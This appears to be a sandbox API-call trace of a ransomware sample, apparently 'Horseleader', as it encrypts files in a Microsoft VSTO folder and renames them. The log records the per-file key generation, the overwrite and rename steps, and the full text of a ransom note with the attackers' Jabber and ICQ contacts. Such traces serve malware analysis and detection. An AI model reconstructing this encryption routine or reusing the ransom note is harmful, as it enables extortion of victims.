lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.715] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.716] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.717] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.717] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.717] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.717] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1b68, lpOverlapped=0x0) returned 1 [0250.717] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe498, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1b68, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1b68, lpOverlapped=0x0) returned 1 [0250.718] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.718] WriteFile 
(in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.718] CloseHandle (hObject=0x1a4) returned 1 [0250.719] GetProcessHeap () returned 0x780000 [0250.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.719] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll.horseleader") returned 96 [0250.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.horseleader")) returned 1 [0250.721] GetProcessHeap () returned 0x780000 [0250.721] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.721] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd51096e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0xbb68, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOMessageProvider.dll", 
cAlternateFileName="VSTOME~1.DLL")) returned 0 [0250.721] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.721] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\#Decrypt#.txt") returned 74 [0250.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.722] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.722] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.724] lstrlenA (lpString="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") returned 1368 [0250.724] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.724] CloseHandle (hObject=0x158) returned 1 [0250.724] GetProcessHeap () returned 0x780000 [0250.724] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.724] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2d148, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0250.724] lstrcmpiW (lpString1="vstoee.dll", lpString2="Windows") returned -1 [0250.725] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0250.725] StrStrIW (lpFirst="vstoee.dll", lpSrch=".horseleader") returned 0x0 [0250.725] lstrcmpW (lpString1="vstoee.dll", lpString2="#Decrypt#.txt") returned 1 [0250.725] lstrcmpW (lpString1="vstoee.dll", lpString2="_uninstalling_.png") returned 1 [0250.725] lstrlenW (lpString=".testttjffg") returned 11 [0250.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\VSTO\\vstoee.dll", lpSrch=".testttjffg") returned 0x0 [0250.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.727] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0250.727] StrStrW (lpFirst="vstoee.dll", lpSrch=".txt") returned 0x0 [0250.727] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=184648) returned 1 [0250.727] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.727] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.730] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.730] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.731] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x140a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.731] ReadFile 
(in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.732] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.732] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.732] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x28148, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.732] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.737] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.737] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.737] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.737] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.737] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, 
lpOverlapped=0x0) returned 1 [0250.737] CloseHandle (hObject=0x158) returned 1 [0250.738] GetProcessHeap () returned 0x780000 [0250.738] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.738] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.horseleader") returned 78 [0250.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.horseleader")) returned 1 [0250.739] GetProcessHeap () returned 0x780000 [0250.739] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.739] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c693e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x3f50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee100.tlb", cAlternateFileName="VSTOEE~1.TLB")) returned 1 [0250.739] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="Windows") returned -1 [0250.739] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0250.739] StrStrIW (lpFirst="vstoee100.tlb", lpSrch=".horseleader") returned 0x0 [0250.740] lstrcmpW (lpString1="vstoee100.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.740] lstrcmpW (lpString1="vstoee100.tlb", 
lpString2="_uninstalling_.png") returned 1 [0250.740] lstrlenW (lpString=".testttjffg") returned 11 [0250.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb", lpSrch=".testttjffg") returned 0x0 [0250.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.741] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0250.741] StrStrW (lpFirst="vstoee100.tlb", lpSrch=".txt") returned 0x0 [0250.741] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16208) returned 1 [0250.741] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f50, lpOverlapped=0x0) returned 1 [0250.743] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc0b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.744] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f50, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f50, lpOverlapped=0x0) returned 1 [0250.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0250.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.744] CloseHandle (hObject=0x158) returned 1 [0250.745] GetProcessHeap () returned 0x780000 [0250.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb.horseleader") returned 81 [0250.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.horseleader")) returned 1 [0250.748] GetProcessHeap () returned 0x780000 [0250.748] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.748] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c8f540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5550, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 1 
[0250.748] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="Windows") returned -1 [0250.748] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0250.748] StrStrIW (lpFirst="vstoee90.tlb", lpSrch=".horseleader") returned 0x0 [0250.748] lstrcmpW (lpString1="vstoee90.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.749] lstrcmpW (lpString1="vstoee90.tlb", lpString2="_uninstalling_.png") returned 1 [0250.749] lstrlenW (lpString=".testttjffg") returned 11 [0250.749] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb", lpSrch=".testttjffg") returned 0x0 [0250.749] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.749] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.750] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0250.751] StrStrW (lpFirst="vstoee90.tlb", lpSrch=".txt") returned 0x0 [0250.751] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=21840) returned 1 [0250.751] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.753] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.753] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.754] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x550, lpOverlapped=0x0) returned 1 [0250.754] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffab0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.754] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x550, lpOverlapped=0x0) returned 1 [0250.754] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.754] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.755] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.755] CloseHandle (hObject=0x158) returned 1 [0250.755] GetProcessHeap () returned 0x780000 [0250.755] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.755] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb.horseleader") returned 80 
[0250.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.horseleader")) returned 1 [0250.756] GetProcessHeap () returned 0x780000 [0250.756] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.756] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c8f540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5550, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 0 [0250.756] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.756] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\#Decrypt#.txt") returned 69 [0250.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.757] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from 
https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
